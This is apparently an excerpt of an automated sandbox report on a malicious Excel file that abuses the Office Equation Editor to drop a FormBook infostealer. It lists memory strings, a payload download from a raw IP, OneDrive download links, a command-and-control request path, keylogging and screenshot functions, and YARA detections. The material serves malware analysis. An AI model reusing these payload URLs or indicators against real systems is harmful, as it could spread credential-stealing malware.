Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000004.00000002.564186238.00000000041D0000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.564186238.00000000041D0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: explorer.exe, 00000006.00000000.533320819.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.524090665.00000000044E7000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp String found in binary or memory: https://onedrive.live.com/
Source: vbc.exe, 00000004.00000002.562388389.0000000003440000.00000004.00000001.sdmp String found in binary or memory: https://onedrive.live.com/download?cid=019F6FABB02B7788&resid=19F6FABB02B7788%21112&authkey=AE1p912K
Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp String found in binary or memory: https://onedrive.live.com/h
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp String found in binary or memory: https://prigmg.am.files.1drv.com/
Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: https://prigmg.am.files.1drv.com/y4mfRNWO7SrNuAYoryEOMK_9RlPbjHtMV-Ced5E-MYQaa4drd6L19k6a-_ziTYMgTYz
Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp String found in binary or memory: https://prigmg.am.files.1drv.com/y4mqjjzWO8S-4gOMPNZjROyLuecmLMO_yUlIbF8EkCZOGaN9ucABdXCb_4exrao8vW7
Source: vbc.exe, 00000004.00000002.560816564.0000000000742000.00000004.00000020.sdmp, vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: https://prigmg.am.files.1drv.com/y4mwh1Q_kqHdVkzavMrAxJ1wAVvTumvDrRTyon4A-0Nej1qBpoUH6im7VZQh8GfsFzJ
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A766E4F6.emf
Source: unknown DNS traffic detected: queries for: onedrive.live.com
Source: global traffic HTTP traffic detected: GET /7009/binso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.250.31.113Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig== HTTP/1.1Host: www.urzeczenie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 02 Dec 2021 18:35:28 GMTServer: Apache/2Content-Length: 392Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 6e 6f 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 75 72 7a 65 63 7a 65 6e 69 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hno0/ was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2 Server at www.urzeczenie.com Port 80</address></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 13.250.31.113 (this identical event is listed 50 times in the report)
Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: vbc.exe, 00000004.00000002.560538430.00000000006B1000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\Public\vbc.exe Code function: 4_2_00433B64 GetKeyboardState, 4_2_00433B64
Contains functionality to record screenshots
Source: C:\Users\Public\vbc.exe Code function: 4_2_00425A40 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 4_2_00425A40

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Detected potential crypto function
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966E8 0_2_02E966E8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966F3 0_2_02E966F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E96340 0_2_02E96340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E96743 0_2_02E96743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E96753 0_2_02E96753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E9CF01 0_2_02E9CF01
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044629C 4_2_0044629C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044B47C 4_2_0044B47C
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_0044629C 7_2_0044629C
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_0044B47C 7_2_0044B47C
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_0044629C 10_2_0044629C
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_0044B47C 10_2_0044B47C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_02071238
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FCE0C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0201A37B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FE905A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_020763BF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FD3040
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FFD005
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FF63DB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FCF3CF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0204D06D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FD7353
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FD2305
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FCE2E9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0205D13F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FEC5F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_02072622
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0201A634
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FD351F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FE1489
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0205579A
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_020057C3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0205443E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FDC7BC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0200D47D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_02005485
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FDE6C1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_02016540
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FD4680
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_020505E3
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FE69FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FD29B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_02083A83
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FF286D
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FDC85C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0207CBA4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_02056BCB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0205DBDA
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FCFBD7
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0204F8C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0206F8EE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FF7B00
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0205394B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_02055955
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0207098E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_02002E2F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FDCD5B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0205BF14
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0206CFB1
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_02042FDC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0205AC5E
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FFDF7C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FE0F3F
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_02000D3B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_01FEEE4C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0206FDDD
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0009D192
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0009B8C6
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0009C953
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00088C7B
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00088C80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0009BCA9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00082D87
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00082D90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_0009BDFF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00082FB0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00396F06
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_003932FF
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00393302
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00391362
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00391359
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_003957B2
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_003908FB
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00390902
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 12_2_00397D02
PE file contains strange resources
Source: binso[1].exe.2.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Odhbljup.exe.4.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll
Source: C:\Users\Public\vbc.exe Section loaded: amsi.dll
Source: C:\Users\Public\vbc.exe Section loaded: ieproxy.dll
Source: C:\Users\Public\vbc.exe Section loaded: ieproxy.dll
Source: C:\Users\Public\vbc.exe Section loaded: ieproxy.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: amsi.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: amsi.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: amsi.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: amsi.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: amsi.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: amsi.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: ieproxy.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: ieproxy.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: ieproxy.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: amsi.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: amsi.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: amsi.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: amsi.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: amsi.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: amsi.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: ieproxy.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: ieproxy.dll
Source: C:\Users\user\Odhbljup.exe Section loaded: ieproxy.dll
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\Odhbljup.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\Odhbljup.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\Odhbljup.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\Odhbljup.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76E90000 page execute and read and write
Yara signature match
Source: 00000007.00000003.560841692.00000000046D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583392738.00000000038CC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497269548.00000000045D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.584292302.00000000045A4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.562335520.00000000046D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.561342324.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560628845.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000003.497233291.00000000045D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560576590.00000000046D4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000004.00000003.497427116.0000000003A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 0000000A.00000003.583748218.00000000045A4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: 00000007.00000003.560966486.00000000039EC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
